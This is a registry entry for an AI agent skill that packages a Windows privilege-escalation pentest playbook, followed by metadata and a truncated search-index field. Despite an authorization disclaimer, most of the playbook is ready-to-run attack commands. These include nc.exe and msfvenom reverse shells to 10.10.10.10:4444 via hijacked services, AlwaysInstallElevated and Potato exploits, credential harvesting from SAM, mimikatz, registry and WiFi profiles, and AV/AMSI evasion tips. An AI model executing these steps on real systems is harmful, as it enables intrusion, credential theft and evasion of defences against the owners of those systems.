{"id":"e6096ef5-e942-4a1a-b1e7-5be46f7e7f58","shortId":"kuUuzt","kind":"skill","title":"windows-privilege-escalation","tagline":"Provide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements.","description":"> AUTHORIZED USE ONLY: Use this skill only for authorized security assessments, defensive validation, or controlled educational environments.\n\n# Windows Privilege Escalation\n\n## Purpose\n\nProvide systematic methodologies for discovering and exploiting privilege escalation vulnerabilities on Windows systems during penetration testing engagements. This skill covers system enumeration, credential harvesting, service exploitation, token impersonation, kernel exploits, and various misconfigurations that enable escalation from standard user to Administrator or SYSTEM privileges.\n\n## Inputs / Prerequisites\n\n- **Initial Access**: Shell or RDP access as standard user on Windows system\n- **Enumeration Tools**: WinPEAS, PowerUp, Seatbelt, or manual commands\n- **Exploit Binaries**: Pre-compiled exploits or ability to transfer tools\n- **Knowledge**: Understanding of Windows security model and privileges\n- **Authorization**: Written permission for penetration testing activities\n\n## Outputs / Deliverables\n\n- **Privilege Escalation Path**: Identified vector to higher privileges\n- **Credential Dump**: Harvested passwords, hashes, or tokens\n- **Elevated Shell**: Command execution as Administrator or SYSTEM\n- **Vulnerability Report**: Documentation of misconfigurations and exploits\n- **Remediation Recommendations**: Fixes for identified weaknesses\n\n## Core Workflow\n\n### 1. System Enumeration\n\n#### Basic System Information\n```powershell\n# OS version and patches\nsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"\nwmic qfe\n\n# Architecture\nwmic os get osarchitecture\necho %PROCESSOR_ARCHITECTURE%\n\n# Environment variables\nset\nGet-ChildItem Env: | ft Key,Value\n\n# List drives\nwmic logicaldisk get caption,description,providername\n```\n\n#### User Enumeration\n```powershell\n# Current user\nwhoami\necho %USERNAME%\n\n# User privileges\nwhoami /priv\nwhoami /groups\nwhoami /all\n\n# All users\nnet user\nGet-LocalUser | ft Name,Enabled,LastLogon\n\n# User details\nnet user administrator\nnet user %USERNAME%\n\n# Local groups\nnet localgroup\nnet localgroup administrators\nGet-LocalGroupMember Administrators | ft Name,PrincipalSource\n```\n\n#### Network Enumeration\n```powershell\n# Network interfaces\nipconfig /all\nGet-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address\n\n# Routing table\nroute print\nGet-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric\n\n# ARP table\narp -A\n\n# Active connections\nnetstat -ano\n\n# Network shares\nnet share\n\n# Domain Controllers\nnltest /DCLIST:DomainName\n```\n\n#### Antivirus Enumeration\n```powershell\n# Check AV products\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName\n```\n\n### 2. Credential Harvesting\n\n#### SAM and SYSTEM Files\n```powershell\n# SAM file locations\n%SYSTEMROOT%\\repair\\SAM\n%SYSTEMROOT%\\System32\\config\\RegBack\\SAM\n%SYSTEMROOT%\\System32\\config\\SAM\n\n# SYSTEM file locations\n%SYSTEMROOT%\\repair\\system\n%SYSTEMROOT%\\System32\\config\\SYSTEM\n%SYSTEMROOT%\\System32\\config\\RegBack\\system\n\n# Extract hashes (from Linux after obtaining files)\npwdump SYSTEM SAM > sam.txt\nsamdump2 SYSTEM SAM -o sam.txt\n\n# Crack with John\njohn --format=NT sam.txt\n```\n\n#### HiveNightmare (CVE-2021-36934)\n```powershell\n# Check vulnerability\nicacls C:\\Windows\\System32\\config\\SAM\n# Vulnerable if: BUILTIN\\Users:(I)(RX)\n\n# Exploit with mimikatz\nmimikatz> token::whoami /full\nmimikatz> misc::shadowcopies\nmimikatz> lsadump::sam /system:\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SYSTEM /sam:\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SAM\n```\n\n#### Search for Passwords\n```powershell\n# Search file contents\nfindstr /SI /M \"password\" *.xml *.ini *.txt\nfindstr /si password *.xml *.ini *.txt *.config\n\n# Search registry\nreg query HKLM /f password /t REG_SZ /s\nreg query HKCU /f password /t REG_SZ /s\n\n# Windows Autologin credentials\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2>nul | findstr \"DefaultUserName DefaultDomainName DefaultPassword\"\n\n# PuTTY sessions\nreg query \"HKCU\\Software\\SimonTatham\\PuTTY\\Sessions\"\n\n# VNC passwords\nreg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"\nreg query HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4 /v password\n\n# Search for specific files\ndir /S /B *pass*.txt == *pass*.xml == *cred* == *vnc* == *.config*\nwhere /R C:\\ *.ini\n```\n\n#### Unattend.xml Credentials\n```powershell\n# Common locations\nC:\\unattend.xml\nC:\\Windows\\Panther\\Unattend.xml\nC:\\Windows\\Panther\\Unattend\\Unattend.xml\nC:\\Windows\\system32\\sysprep.inf\nC:\\Windows\\system32\\sysprep\\sysprep.xml\n\n# Search for files\ndir /s *sysprep.inf *sysprep.xml *unattend.xml 2>nul\n\n# Decode base64 password (Linux)\necho \"U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=\" | base64 -d\n```\n\n#### WiFi Passwords\n```powershell\n# List profiles\nnetsh wlan show profile\n\n# Get cleartext password\nnetsh wlan show profile <SSID> key=clear\n\n# Extract all WiFi passwords\nfor /f \"tokens=4 delims=: \" %a in ('netsh wlan show profiles ^| find \"Profile \"') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr \"SSID Cipher Key\" | find /v \"Number\" & echo.) & @echo on\n```\n\n#### PowerShell History\n```powershell\n# View PowerShell history\ntype %userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt\ncat (Get-PSReadlineOption).HistorySavePath\ncat (Get-PSReadlineOption).HistorySavePath | sls passw\n```\n\n### 3. Service Exploitation\n\n#### Incorrect Service Permissions\n```powershell\n# Find misconfigured services\naccesschk.exe -uwcqv \"Authenticated Users\" * /accepteula\naccesschk.exe -uwcqv \"Everyone\" * /accepteula\naccesschk.exe -ucqv <service_name>\n\n# Look for: SERVICE_ALL_ACCESS, SERVICE_CHANGE_CONFIG\n\n# Exploit vulnerable service\nsc config <service> binpath= \"C:\\nc.exe -e cmd.exe 10.10.10.10 4444\"\nsc stop <service>\nsc start <service>\n```\n\n#### Unquoted Service Paths\n```powershell\n# Find unquoted paths\nwmic service get name,displayname,pathname,startmode | findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\"\nwmic service get name,displayname,startmode,pathname | findstr /i /v \"C:\\Windows\\\\\" | findstr /i /v \"\"\"\n\n# Exploit: Place malicious exe in path\n# For path: C:\\Program Files\\Some App\\service.exe\n# Try: C:\\Program.exe or C:\\Program Files\\Some.exe\n```\n\n#### AlwaysInstallElevated\n```powershell\n# Check if enabled\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\n\n# Both must return 0x1 for vulnerability\n\n# Create malicious MSI\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o evil.msi\n\n# Install (runs as SYSTEM)\nmsiexec /quiet /qn /i C:\\evil.msi\n```\n\n### 4. Token Impersonation\n\n#### Check Impersonation Privileges\n```powershell\n# Look for these privileges\nwhoami /priv\n\n# Exploitable privileges:\n# SeImpersonatePrivilege\n# SeAssignPrimaryTokenPrivilege\n# SeTcbPrivilege\n# SeBackupPrivilege\n# SeRestorePrivilege\n# SeCreateTokenPrivilege\n# SeLoadDriverPrivilege\n# SeTakeOwnershipPrivilege\n# SeDebugPrivilege\n```\n\n#### Potato Attacks\n```powershell\n# JuicyPotato (Windows Server 2019 and below)\nJuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c c:\\tools\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -t *\n\n# PrintSpoofer (Windows 10 and Server 2019)\nPrintSpoofer.exe -i -c cmd\n\n# RoguePotato\nRoguePotato.exe -r 10.10.10.10 -e \"C:\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -l 9999\n\n# GodPotato\nGodPotato.exe -cmd \"cmd /c whoami\"\n```\n\n### 5. Kernel Exploitation\n\n#### Find Kernel Vulnerabilities\n```powershell\n# Use Windows Exploit Suggester\nsysteminfo > systeminfo.txt\npython wes.py systeminfo.txt\n\n# Or use Watson (on target)\nWatson.exe\n\n# Or use Sherlock PowerShell script\npowershell.exe -ExecutionPolicy Bypass -File Sherlock.ps1\n```\n\n#### Common Kernel Exploits\n```\nMS17-010 (EternalBlue) - Windows 7/2008/2003/XP\nMS16-032 - Secondary Logon Handle - 2008/7/8/10/2012\nMS15-051 - Client Copy Image - 2003/2008/7\nMS14-058 - TrackPopupMenu - 2003/2008/7/8.1\nMS11-080 - afd.sys - XP/2003\nMS10-015 - KiTrap0D - 2003/XP/2000\nMS08-067 - NetAPI - 2000/XP/2003\nCVE-2021-1732 - Win32k - Windows 10/Server 2019\nCVE-2020-0796 - SMBGhost - Windows 10\nCVE-2019-1388 - UAC Bypass - Windows 7/8/10/2008/2012/2016/2019\n```\n\n### 6. Additional Techniques\n\n#### DLL Hijacking\n```powershell\n# Find missing DLLs with Process Monitor\n# Filter: Result = NAME NOT FOUND, Path ends with .dll\n\n# Compile malicious DLL\n# For x64: x86_64-w64-mingw32-gcc windows_dll.c -shared -o evil.dll\n# For x86: i686-w64-mingw32-gcc windows_dll.c -shared -o evil.dll\n```\n\n#### Runas with Saved Credentials\n```powershell\n# List saved credentials\ncmdkey /list\n\n# Use saved credentials\nrunas /savecred /user:Administrator \"cmd.exe /k whoami\"\nrunas /savecred /user:WORKGROUP\\Administrator \"\\\\10.10.10.10\\share\\evil.exe\"\n```\n\n#### WSL Exploitation\n```powershell\n# Check for WSL\nwsl whoami\n\n# Set root as default user\nwsl --default-user root\n# Or: ubuntu.exe config --default-user root\n\n# Spawn shell as root\nwsl whoami\nwsl python -c 'import os; os.system(\"/bin/bash\")'\n```\n\n## Quick Reference\n\n### Enumeration Tools\n\n| Tool | Command | Purpose |\n|------|---------|---------|\n| WinPEAS | `winPEAS.exe` | Comprehensive enumeration |\n| PowerUp | `Invoke-AllChecks` | Service/path vulnerabilities |\n| Seatbelt | `Seatbelt.exe -group=all` | Security audit checks |\n| Watson | `Watson.exe` | Missing patches |\n| JAWS | `.\\jaws-enum.ps1` | Legacy Windows enum |\n| PrivescCheck | `Invoke-PrivescCheck` | Privilege escalation checks |\n\n### Default Writable Folders\n\n```\nC:\\Windows\\Temp\nC:\\Windows\\Tasks\nC:\\Users\\Public\nC:\\Windows\\tracing\nC:\\Windows\\System32\\spool\\drivers\\color\nC:\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\n```\n\n### Common Privilege Escalation Vectors\n\n| Vector | Check Command |\n|--------|---------------|\n| Unquoted paths | `wmic service get pathname \\| findstr /i /v \"\"\"` |\n| Weak service perms | `accesschk.exe -uwcqv \"Everyone\" *` |\n| AlwaysInstallElevated | `reg query HKCU\\...\\Installer /v AlwaysInstallElevated` |\n| Stored credentials | `cmdkey /list` |\n| Token privileges | `whoami /priv` |\n| Scheduled tasks | `schtasks /query /fo LIST /v` |\n\n### Impersonation Privilege Exploits\n\n| Privilege | Tool | Usage |\n|-----------|------|-------|\n| SeImpersonatePrivilege | JuicyPotato | CLSID abuse |\n| SeImpersonatePrivilege | PrintSpoofer | Spooler service |\n| SeImpersonatePrivilege | RoguePotato | OXID resolver |\n| SeBackupPrivilege | robocopy /b | Read protected files |\n| SeRestorePrivilege | Enable-SeRestorePrivilege | Write protected files |\n| SeTakeOwnershipPrivilege | takeown.exe | Take file ownership |\n\n## Constraints and Limitations\n\n### Operational Boundaries\n- Kernel exploits may cause system instability\n- Some exploits require specific Windows versions\n- AV/EDR may detect and block common tools\n- Token impersonation requires service account context\n- Some techniques require GUI access\n\n### Detection Considerations\n- Credential dumping triggers security alerts\n- Service modification logged in Event Logs\n- PowerShell execution may be monitored\n- Known exploit signatures detected by AV\n\n### Legal Requirements\n- Only test systems with written authorization\n- Document all escalation attempts\n- Avoid disrupting production systems\n- Report all findings through proper channels\n\n## Examples\n\n### Example 1: Service Binary Path Exploitation\n```powershell\n# Find vulnerable service\naccesschk.exe -uwcqv \"Authenticated Users\" * /accepteula\n# Result: RW MyService SERVICE_ALL_ACCESS\n\n# Check current config\nsc qc MyService\n\n# Stop service and change binary path\nsc stop MyService\nsc config MyService binpath= \"C:\\Users\\Public\\nc.exe 10.10.10.10 4444 -e cmd.exe\"\nsc start MyService\n\n# Catch shell as SYSTEM\n```\n\n### Example 2: AlwaysInstallElevated Exploitation\n```powershell\n# Verify vulnerability\nreg query HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\nreg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated\n# Both return: 0x1\n\n# Generate payload (attacker machine)\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi -o shell.msi\n\n# Transfer and execute\nmsiexec /quiet /qn /i C:\\Users\\Public\\shell.msi\n\n# Catch SYSTEM shell\n```\n\n### Example 3: JuicyPotato Token Impersonation\n```powershell\n# Verify SeImpersonatePrivilege\nwhoami /priv\n# SeImpersonatePrivilege Enabled\n\n# Run JuicyPotato\nJuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c c:\\users\\public\\nc.exe 10.10.10.10 4444 -e cmd.exe\" -t * -c {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}\n\n# Catch SYSTEM shell\n```\n\n### Example 4: Unquoted Service Path\n```powershell\n# Find unquoted path\nwmic service get name,pathname | findstr /i /v \"\"\"\n# Result: C:\\Program Files\\Vuln App\\service.exe\n\n# Check write permissions\nicacls \"C:\\Program Files\\Vuln App\"\n# Result: Users:(W)\n\n# Place malicious binary\ncopy C:\\Users\\Public\\shell.exe \"C:\\Program Files\\Vuln.exe\"\n\n# Restart service\nsc stop \"Vuln App\"\nsc start \"Vuln App\"\n```\n\n### Example 5: Credential Harvesting from Registry\n```powershell\n# Check for auto-logon credentials\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"\n# DefaultUserName: Administrator\n# DefaultPassword: P@ssw0rd123\n\n# Use credentials\nrunas /user:Administrator cmd.exe\n# Or for remote: psexec \\\\target -u Administrator -p P@ssw0rd123 cmd\n```\n\n## Troubleshooting\n\n| Issue | Cause | Solution |\n|-------|-------|----------|\n| Exploit fails (AV detected) | AV blocking known exploits | Use obfuscated exploits; living-off-the-land (mshta, certutil); custom compiled binaries |\n| Service won't start | Binary path syntax | Ensure space after `=` in binpath: `binpath= \"C:\\path\\binary.exe\"` |\n| Token impersonation fails | Wrong privilege/version | Check `whoami /priv`; verify Windows version compatibility |\n| Can't find kernel exploit | System patched | Run Windows Exploit Suggester: `python wes.py systeminfo.txt` |\n| PowerShell blocked | Execution policy/AMSI | Use `powershell -ep bypass -c \"cmd\"` or `-enc <base64>` |\n\n## When to Use\nThis skill is applicable to execute the workflow or actions described in the overview.","tags":["windows","privilege","escalation","antigravity","awesome","skills","sickn33","agent-skills","agentic-skills","ai-agent-skills","ai-agents","ai-coding"],"capabilities":["skill","source-sickn33","skill-windows-privilege-escalation","topic-agent-skills","topic-agentic-skills","topic-ai-agent-skills","topic-ai-agents","topic-ai-coding","topic-ai-workflows","topic-antigravity","topic-antigravity-skills","topic-claude-code","topic-claude-code-skills","topic-codex-cli","topic-codex-skills"],"categories":["antigravity-awesome-skills"],"synonyms":[],"warnings":[],"endpointUrl":"https://skills.sh/sickn33/antigravity-awesome-skills/windows-privilege-escalation","protocol":"skill","transport":"skills-sh","auth":{"type":"none","details":{"cli":"npx skills add sickn33/antigravity-awesome-skills","source_repo":"https://github.com/sickn33/antigravity-awesome-skills","install_from":"skills.sh"}},"qualityScore":"0.700","qualityRationale":"deterministic score 0.70 from registry signals: · indexed on github topic:agent-skills · 34404 github stars · SKILL.md body (14,132 chars)","verified":false,"liveness":"unknown","lastLivenessCheck":null,"agentReviews":{"count":0,"score_avg":null,"cost_usd_avg":null,"success_rate":null,"latency_p50_ms":null,"narrative_summary":null,"summary_updated_at":null},"enrichmentModel":"deterministic:skill-github:v1","enrichmentVersion":1,"enrichedAt":"2026-04-22T00:51:59.272Z","embedding":null,"createdAt":"2026-04-18T21:47:37.491Z","updatedAt":"2026-04-22T00:51:59.272Z","lastSeenAt":"2026-04-22T00:51:59.272Z","tsv":"'-010':948 '-015':973 '-032':953 '-051':959 '-058':965 '-067':977 '-0796':989 '-080':969 '-1388':995 '-1732':982 '-2019':994 '-2020':988 '-2021':395,981 '-36934':396 '/accepteula':687,691,1362 '/all':238,278 '/b':188,534,1250 '/bin/bash':1114 '/c':189,192,874,910,1485 '/dclist':314 '/f':467,476,612 '/fo':1227 '/full':418 '/groups':236 '/i':733,736,748,753,829,1200,1454,1520 '/k':1067 '/list':1058,1218 '/m':450 '/namespace':325 '/node':323 '/priv':234,844,1222,1471,1655 '/qn':828,1453 '/query':1226 '/quiet':827,1452 '/r':543 '/s':472,481,533,575 '/sam':433 '/savecred':1063,1070 '/si':449,456 '/system':425 '/t':469,478 '/user':1064,1071,1593 '/v':526,641,737,749,754,790,800,1201,1213,1229,1418,1428,1521 '0x1':805,1432 '1':175,1349 '10':885,992 '10.10.10.10':712,815,878,896,900,1074,1392,1441,1490 '10/server':985 '1337':867,1478 '2':332,494,579,1404 '2000/xp/2003':979 '2003/2008/7':963 '2003/2008/7/8.1':967 '2003/xp/2000':975 '2008/7/8/10/2012':957 '2019':862,888,986 '3':673,1463 '4':614,832,1506 '4444':713,817,879,901,1393,1443,1491 '4f35':1499 '5':912,1564 '6':1000 '64':1027 '7/2008/2003/xp':951 '7/8/10/2008/2012/2016/2019':999 '800efcf26b83':1501 '8ec0':1500 '9999':905 'abil':116 'abus':1239 'access':90,94,698,1300,1368 'accesschk.exe':683,688,692,1205,1358 'account':1294 'action':1698 'activ':134,303 'addit':1001 'addressfamili':293 'administr':83,157,254,264,268,1065,1073,1586,1594,1602 'afd.sys':970 'alert':1307 'allcheck':1129 'alwaysinstallelev':777,791,801,1208,1214,1405,1419,1429 'ano':306 'antivirus':316 'antivirusproduct':329 'app':767,1527,1537,1558,1562 'appdata':654 'applic':1692 'architectur':197,204 'arp':299,301 'assess':32 'attack':857,1435 'attempt':1336 'audit':1137 'authent':685,1360 'author':22,30,128,1332 'auto':734,1573 'auto-logon':1572 'autologin':483 'av':320,1324,1613,1615 'av/edr':1283 'avoid':1337 'base64':582,587 'basic':178 'binari':110,1351,1379,1543,1631,1636 'binary.exe':1647 'binpath':707,1387,1643,1644 'block':1287,1616,1675 'boundari':1270 'builtin':408 'bypass':941,997,1681 'c':401,544,551,553,557,562,566,708,738,750,763,770,773,830,869,875,891,898,1110,1161,1164,1167,1170,1173,1179,1388,1455,1480,1486,1495,1523,1533,1545,1549,1645,1682 'caption':220 'cat':661,666 'catch':1399,1459,1502 'caus':1274,1609 'certutil':1628 'chang':700,1378 'channel':1346 'check':319,398,779,835,1080,1138,1157,1191,1369,1529,1570,1653 'childitem':210 'cipher':638 'clear':606,635 'cleartext':599 'client':960 'clsid':1238 'cmd':892,908,909,1606,1683 'cmd.exe':711,872,881,903,1066,1395,1483,1493,1595 'cmdkey':1057,1217 'color':1178 'command':108,154,1120,1192 'common':549,944,1186,1288 'compat':1659 'compil':113,1021,1630 'comprehens':1124 'config':348,353,363,367,404,431,439,461,541,701,706,1097,1371,1385 'connect':304 'consider':1302 'consolehost_history.txt':660 'constraint':1266 'content':447 'context':1295 'control':36,312 'copi':961,1544 'core':173 'cover':62 'crack':386 'creat':808 'cred':539 'credenti':65,145,333,484,547,1052,1056,1061,1216,1303,1565,1575,1591 'crypto':1183 'current':226,1370 'currentvers':492,1583 'custom':1629 'cve':394,980,987,993 'd':588 'da9a':1498 'decod':581 'default':1088,1092,1099,1158 'default-us':1091,1098 'defaultdomainnam':498 'defaultpassword':499,1587 'defaultusernam':497,1585 'defens':33 'delim':615 'deliver':136 'describ':1699 'descript':221 'destinationprefix':296 'detail':251 'detect':1285,1301,1322,1614 'devic':427,435 'dir':532,574 'discov':9,47 'displaynam':331,729,744 'disrupt':1338 'dll':1003,1020,1023 'dll.c':1033,1045 'dlls':1008 'document':162,1333 'domain':311 'domainnam':315 'drive':216 'driver':1177 'dump':146,1304 'e':710,880,897,902,1394,1492 'echo':202,229,585,625,643,644 'educ':37 'elev':152 'enabl':77,248,781,1256,1473 'enable-serestoreprivileg':1255 'enc':1685 'end':1018 'engag':21,59 'ensur':1639 'enum':1146,1150 'enumer':64,101,177,224,273,317,1117,1125 'env':211 'environ':38,205 'ep':1680 'escal':4,13,41,51,78,138,1156,1188,1335 'eternalblu':949 'event':1312 'everyon':690,1207 'evil.dll':1036,1048 'evil.exe':1076 'evil.msi':821,831 'exampl':1347,1348,1403,1462,1505,1563 'exe':758 'execut':155,1315,1450,1676,1694 'executionpolici':940 'exploit':11,49,68,72,109,114,166,412,675,702,755,845,914,921,946,1078,1232,1272,1278,1320,1353,1406,1611,1618,1621,1664,1669 'extract':370,607 'f':818,1444 'f87b28f1':1497 'f87b28f1-da9a-4f35-8ec0-800efcf26b83':1496 'fail':1612,1650 'file':338,341,356,376,446,531,573,765,775,942,1253,1260,1264,1525,1535,1551 'filter':1012 'find':622,640,680,722,915,1006,1343,1355,1511,1662 'findstr':187,448,455,496,636,732,735,747,752,1199,1519 'fix':169 'folder':1160 'format':390 'found':1016 'ft':212,246,269,282,295 'gcc':1031,1043 'generat':1433 'get':200,209,219,244,266,280,291,330,598,663,668,727,742,1197,1516 'get-childitem':208 'get-localgroupmemb':265 'get-localus':243 'get-netipconfigur':279 'get-netrout':290 'get-psreadlineopt':662,667 'globalroot':426,434 'godpotato':906 'godpotato.exe':907 'group':259,1134 'gui':1299 'handl':956 'harddiskvolumeshadowcopy1':428,436 'harvest':66,147,334,1566 'hash':149,371 'higher':143 'hijack':1004 'histori':647,651 'historysavepath':665,670 'hivenightmar':393 'hkcu':475,504,513,784,1211,1412 'hkey':520 'hklm':466,487,794,1422,1578 'i686':1040 'i686-w64-mingw32-gcc':1039 'icacl':400,1532 'identifi':140,171 'imag':962 'imperson':70,834,836,1230,1291,1466,1649 'import':1111 'incorrect':676 'inform':180 'ini':453,459,545 'initi':89 'input':87 'instabl':1276 'instal':789,799,822,1212,1417,1427 'interfac':276 'interfacealia':283 'interfacedescript':284 'invok':1128,1153 'invoke-allcheck':1127 'invoke-privesccheck':1152 'ipconfig':277 'ipv4':294 'ipv4address':285 'issu':1608 'jaw':1143,1145 'jaws-enum':1144 'john':388,389 'juicypotato':859,1237,1464,1475 'juicypotato.exe':865,1476 'kernel':71,913,916,945,1271,1663 'key':213,605,634,639 'kitrap0d':974 'knowledg':120 'known':1319,1617 'l':866,904,1477 'land':1626 'lastlogon':249 'legaci':1148 'legal':1325 'lhost':814,1440 'limit':1268 'linux':373,584 'list':215,592,1054,1228 'live':1623 'living-off-the-land':1622 'local':258,521 'localgroup':261,263 'localgroupmemb':267 'localhost':324 'localus':245 'locat':342,357,550 'log':1310,1313 'logicaldisk':218 'logon':955,1574 'look':694,839 'lport':816,1442 'lsadump':423 'machin':522,1436 'machinekey':1185 'malici':757,809,1022,1542 'manual':107 'may':1273,1284,1316 'methodolog':7,45 'microsoft':489,656,787,797,1182,1415,1425,1580 'mimikatz':414,415,419,422 'mingw32':1030,1042 'misc':420 'misconfigur':75,164,681 'miss':1007,1141 'model':125 'modif':1309 'monitor':1011,1318 'ms08':976 'ms10':972 'ms11':968 'ms14':964 'ms15':958 'ms16':952 'ms17':947 'msfvenom':811,1437 'mshta':1627 'msi':810,819,1445 'msiexec':826,1451 'must':803 'myservic':1365,1374,1383,1386,1398 'name':191,247,270,632,728,743,1014,1517 'nc.exe':709,877,899,1391,1489 'net':241,252,255,260,262,309 'netapi':978 'netipconfigur':281 'netrout':292 'netsh':594,601,618,628 'netstat':305 'network':272,275,307 'nexthop':297 'nltest':313 'nt':391,491,1582 'nul':495,580,627 'number':642 'o':384,820,1035,1047,1446 'obfusc':1620 'obtain':375 'oper':1269 'orl':515 'os':182,190,193,199,1112 'os.system':1113 'osarchitectur':201 'output':135 'overview':1702 'ownership':1265 'oxid':1246 'p':812,868,1438,1479,1588,1603,1604 'panther':555,559 'pass':535,537 'passw':672 'password':148,443,451,457,468,477,510,517,527,583,590,600,610 'patch':185,1142,1666 'path':139,328,720,724,760,762,1017,1194,1352,1380,1509,1513,1637,1646 'pathnam':730,746,1198,1518 'payload':1434 'penetr':19,57,132 'perm':1204 'permiss':130,678,1531 'place':756,1541 'polici':786,796,1414,1424 'policy/amsi':1677 'potato':856 'powershel':181,225,274,318,339,397,444,548,591,646,648,650,658,679,721,778,838,858,918,937,1005,1053,1079,1314,1354,1407,1467,1510,1569,1674,1679 'powershell.exe':939 'powerup':104,1126 'pre':112 'pre-compil':111 'prerequisit':88 'principalsourc':271 'print':289 'printspoof':883,1241 'printspoofer.exe':889 'privesccheck':1151,1154 'privileg':3,12,40,50,86,127,137,144,232,837,842,846,1155,1187,1220,1231,1233 'privilege/version':1652 'process':1010 'processor':203 'product':321,1339 'profil':593,597,604,621,623,631 'program':764,774,1524,1534,1550 'program.exe':771 'proper':1345 'protect':1252,1259 'provid':5,43 'providernam':222 'ps1':1147 'psexec':1599 'psreadlin':659 'psreadlineopt':664,669 'public':1169,1390,1457,1488,1547 'purpos':42,1121 'putti':500,507 'pwdump':377 'python':925,1109,1671 'qc':1373 'qfe':196 'queri':465,474,486,503,512,519,783,793,1210,1411,1421,1577 'quick':1115 'r':895 'rdp':93 'read':1251 'realvnc':524 'recommend':168 'refer':1116 'reg':464,470,473,479,485,502,511,518,782,792,1209,1410,1420,1576 'regback':349,368 'registri':463,1568 'remedi':167 'remot':1598 'repair':344,359 'report':161,1341 'requir':1279,1292,1298,1326 'resolv':1247 'restart':1553 'result':1013,1363,1522,1538 'return':804,1431 'roam':655 'robocopi':1249 'roguepotato':893,1245 'roguepotato.exe':894 'root':326,1086,1094,1101,1105 'rout':286,288 'routemetr':298 'rsa':1184 'run':823,1474,1667 'runa':1049,1062,1069,1592 'rw':1364 'rx':411 'sam':335,340,345,350,354,379,383,405,424,440 'sam.txt':380,385,392 'samdump2':381 'save':1051,1055,1060 'sc':705,714,716,1372,1381,1384,1396,1555,1559 'schedul':1223 'schtask':1225 'script':938 'search':441,445,462,528,571 'seassignprimarytokenprivileg':848 'seatbelt':105,1132 'seatbelt.exe':1133 'sebackupprivileg':850,1248 'secondari':954 'secreatetokenprivileg':852 'secur':31,124,1136,1306 'securitycenter2':327 'sedebugprivileg':855 'seimpersonateprivileg':847,1236,1240,1244,1469,1472 'seloaddriverprivileg':853 'serestoreprivileg':851,1254,1257 'server':861,887 'servic':67,674,677,682,696,699,704,719,726,741,1196,1203,1243,1293,1308,1350,1357,1366,1376,1508,1515,1554,1632 'service.exe':768,1528 'service/path':1130 'session':501,508 'set':207,1085 'setakeownershipprivileg':854,1261 'setcbprivileg':849 'shadowcopi':421 'share':308,310,1034,1046,1075 'shell':91,153,1103,1400,1461,1504 'shell.exe':1548 'shell.msi':1447,1458 'sherlock':936 'sherlock.ps1':943 'show':596,603,620,630 'signatur':1321 'simontatham':506 'skill':27,61,1690 'skill-windows-privilege-escalation' 'sls':671 'smbghost':990 'softwar':488,505,514,523,785,795,1413,1423,1579 'solut':1610 'some.exe':776 'source-sickn33' 'space':1640 'spawn':1102 'specif':530,1280 'spool':1176 'spooler':1242 'ssid':637 'ssw0rd123':1589,1605 'standard':80,96 'start':717,1397,1560,1635 'startmod':731,745 'stop':715,1375,1382,1556 'store':1215 'suggest':922,1670 'syntax':1638 'sysprep':569 'sysprep.inf':565,576 'sysprep.xml':570,577 'system':17,55,63,85,100,159,176,179,337,355,360,364,369,378,382,432,825,1275,1329,1340,1402,1460,1503,1665 'system32':347,352,362,366,403,430,438,564,568,871,1175,1181,1482 'systemat':6,44 'systeminfo':186,923 'systeminfo.txt':924,927,1673 'systemroot':343,346,351,358,361,365 'sz':471,480 'tabl':287,300 'take':1263 'takeown.exe':1262 'target':932,1600 'task':1166,1224 'techniqu':1002,1297 'temp':1163 'test':20,58,133,1328 'token':69,151,416,613,833,1219,1290,1465,1648 'tool':102,119,876,1118,1119,1234,1289 'topic-agent-skills' 'topic-agentic-skills' 'topic-ai-agent-skills' 'topic-ai-agents' 'topic-ai-coding' 'topic-ai-workflows' 'topic-antigravity' 'topic-antigravity-skills' 'topic-claude-code' 'topic-claude-code-skills' 'topic-codex-cli' 'topic-codex-skills' 'trace':1172 'trackpopupmenu':966 'transfer':118,1448 'tri':769 'trigger':1305 'troubleshoot':1607 'txt':454,460,536 'type':652 'u':1601 'u2vjcmv0u2vjdxjlugfzc3dvcmqxmjm0kgo':586 'uac':996 'ubuntu.exe':1096 'ucqv':693 'unattend':560 'unattend.xml':546,552,556,561,578 'understand':121 'unquot':718,723,1193,1507,1512 'usag':1235 'use':23,25,919,929,935,1059,1590,1619,1678,1688 'user':81,97,223,227,231,240,242,250,253,256,409,686,1089,1093,1100,1168,1361,1389,1456,1487,1539,1546 'usernam':230,257 'userprofil':653 'uwcqv':684,689,1206,1359 'valid':34 'valu':214 'variabl':206 'various':74 'vector':141,1189,1190 'verifi':1408,1468,1656 'version':183,194,1282,1658 'view':649 'vnc':509,540 